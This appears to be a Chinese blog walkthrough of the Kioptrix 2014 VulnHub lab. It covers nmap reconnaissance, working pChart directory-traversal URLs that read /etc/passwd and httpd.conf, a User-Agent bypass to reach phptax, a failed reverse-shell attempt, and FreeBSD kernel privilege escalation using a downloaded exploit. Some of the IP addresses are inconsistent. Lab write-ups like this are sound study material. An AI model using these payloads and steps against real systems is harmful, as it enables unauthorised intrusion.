1.环境配置

下载地址：https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2

攻击机kali：192.168.26.128（Nat模式）

靶机配置：Nat模式

这里注意，根据官网地址说明，需要我们先将网络适配器进行删除，再添加一个Nat模式，不然扫描不到该靶机。

2.渗透测试

信息收集

主机探测

nmap -sP 192.168.26.0/24

可以得知靶机ip地址：192.168.26.138 

端口扫描 

nmap -sS -sV -p- 192.168.26.138

显示靶机只开放了80端口跟8080端口，直接访问网站看看

目录扫描

dirbuster扫描----扫描不出什么

漏洞探测

访问网站，只有显示此界面

右键点击查看源代码

访问url中的地址，出现一些目录信息

接下来就是搜索下有没有pChart组件的漏洞：

利用searchsploit是可以搜到pChart组件有个漏洞可以利用的，版本号也刚好对上。

使用searchsploit 31173 --examine 查看利用方法：

可以发现有个目录穿越漏洞，直接访问

http://192.168.26.138/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

结果如下：

可以发现是FreeBSD系统，所以可以知道Apache配置文件目录为/usr/local/etc/apache22/httpd.conf

接下来还是利用目录穿越漏洞访问

http://192.168.0.103/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

结果如下：

寻找一下看看有没有什么有用的信息

在结尾处可以看到，开启8080服务需要设置User-Agent的版本为Mozilla/4.0 Mozilla4_browser。之前扫描开放端口时候，也发现开启了8080端口，先访问下http://192.168.26.138:8080看看：

拒绝我们访问，下面我们直接通过抓包工具，修改下UA，再次访问看看返回值：

修改UA后返回正常，并且返回了"phptax"

或者直接使用curl命令修改UA包头

下面给出curl命令详解

Linux curl命令最全详解-CSDN博客

漏洞利用（phptax）

接下来使用msf搜索下有无phptax的exp可用：

 找到可以的payload，接下来就是利用该exp进行反弹shell

服了噢，没有得到shell，唉，正常来说可以得到shell的，给大家看看别人成功exploit之后的

提权（freebfd）

先查看靶机系统内核信息：

系统内核版本为 FreeBSD 9.0-RELEASE

接下来就是搜索该版本有无提权漏洞：

searchsploit FreeBSD

这边选取一个和内核版本相符的exp，就选第一个28718.c

接下来就是将该exp下载本地，传输到靶机上，编译执行就可以了

先下载exp：

searchsploit -p 28718.c
wget -c https://www.exploit-db.com/exploits/28718

接着利用nc发送该exp

kali发送端：

靶机接收端（还是要先cd进tmp目录）：

其中192.168.26.138为kali的ip 8888为开启的监听端口。

靶机编译并执行exp：

还有个小插曲，这个exp最后还需要空一行，回到kali上将该exp最后新增一行：

 

然后保存退出，继续按照之前nc传输文件，再传输到靶机上。

靶机编译并执行exp：

总结

信息收集还是非常重要的，以及对网站的信息搜索，网站使用的中间件、系统之间的漏洞都可以拿来利用，但是我上面有不足之处，并没有获得webshell，提权就是根据FreeBSD的漏洞进行利用的